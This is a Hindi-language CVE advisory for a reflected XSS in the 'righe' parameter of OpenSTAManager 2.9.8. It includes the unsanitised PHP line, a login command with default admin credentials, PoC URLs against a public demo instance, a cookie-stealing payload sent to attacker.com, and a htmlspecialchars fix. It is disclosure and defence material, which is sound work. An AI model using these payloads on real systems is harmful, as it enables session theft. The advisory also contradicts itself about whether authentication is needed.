
CVE-2026-24415 - OpenSTAManager, modifica_iva.php में righe पैरामीटर के माध्यम से XSS से प्रभावित
| फ़ील्ड | विवरण |
|---|---|
| CVE आईडी | CVE-2026-24415 |
| गंभीरता | मध्यम |
| परामर्श | परामर्श देखें |
| खोजकर्ता | Lukasz Rybak |
OpenSTAManager v2.9.8 में कई रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यताएं बिना प्रमाणीकरण वाले हमलावरों को तैयार किए गए URL पैरामीटरों के माध्यम से अन्य उपयोगकर्ताओं के ब्राउज़रों के संदर्भ में मनमाना जावास्क्रिप्ट कोड निष्पादित करने की अनुमति देती हैं, जिससे संभावित रूप से सत्र अपहरण, क्रेडेंशियल चोरी और अनधिकृत कार्रवाइयां हो सकती हैं।
असुरक्षित पैरामीटर: righe (GET)
OpenSTAManager v2.9.8 में चालान/ऑर्डर/अनुबंध संशोधन मोडल में कई रिफ्लेक्टेड XSS भेद्यताएं हैं। एप्लिकेशन righe GET पैरामीटर से उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को HTML आउटपुट में प्रतिबिंबित करने से पहले ठीक से सैनिटाइज़ करने में विफल रहता है।
असुरक्षित कोड स्थान:
फ़ाइल: /modules/contratti/modals/modifica_iva.php (पंक्ति 125)
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
$_GET['righe'] पैरामीटर को htmlspecialchars() या समकक्ष फ़ंक्शन का उपयोग करके किसी भी सैनिटाइज़ेशन के बिना सीधे HTML value विशेषता में इको किया जाता है। यह हमलावर को विशेषता संदर्भ से बाहर निकलने और मनमाना HTML/जावास्क्रिप्ट इंजेक्ट करने की अनुमति देता है।
सभी प्रभावित फ़ाइलें:
/modules/contratti/modals/modifica_iva.php - पंक्ति 125, पंक्ति 167/modules/preventivi/modals/modifica_iva.php - पंक्ति 125, पंक्ति 167/modules/fatture/modals/modifica_iva.php - पंक्ति 121, पंक्ति 161/modules/ddt/modals/modifica_iva.php - पंक्ति 125, पंक्ति 167/modules/ordini/modals/modifica_iva.php - पंक्ति 125, पंक्ति 167/modules/interventi/modals/modifica_iva.php - पंक्ति 125, पंक्ति 167पूर्वापेक्षाएँ:
चरण 1: लॉगिन
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
चरण 2: XSS ट्रिगर करें ब्राउज़र में निम्न URL पर नेविगेट करें (या कुकीज़ के साथ curl का उपयोग करें):
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
परीक्षित URLs (सभी असुरक्षित):
https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>अपेक्षित परिणाम: जावास्क्रिप्ट अलर्ट पॉपअप वर्तमान सत्र कुकी दिखाते हुए प्रदर्शित होता है, जो कोड निष्पादन की पुष्टि करता है।
HTML आउटपुट (लाइव इंस्टेंस पर सत्यापित):
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
सत्यापन:
वैकल्पिक पेलोड:
सत्र चोरी: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>
प्रभावित उपयोगकर्ता: अनुबंध, चालान, कोटेशन या ऑर्डर मॉड्यूल तक पहुंच वाले सभी प्रमाणित उपयोगकर्ता।
हमले का परिदृश्य:
अनुशंसित समाधान:
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
इस समाधान को विवरण अनुभाग में सूचीबद्ध सभी प्रभावित फ़ाइलों पर लागू करें।
यह CVE समन्वित भेद्यता प्रकटीकरण प्रथाओं का पालन करते हुए जिम्मेदारी से प्रकट किया गया था। यहां दी गई जानकारी केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए है।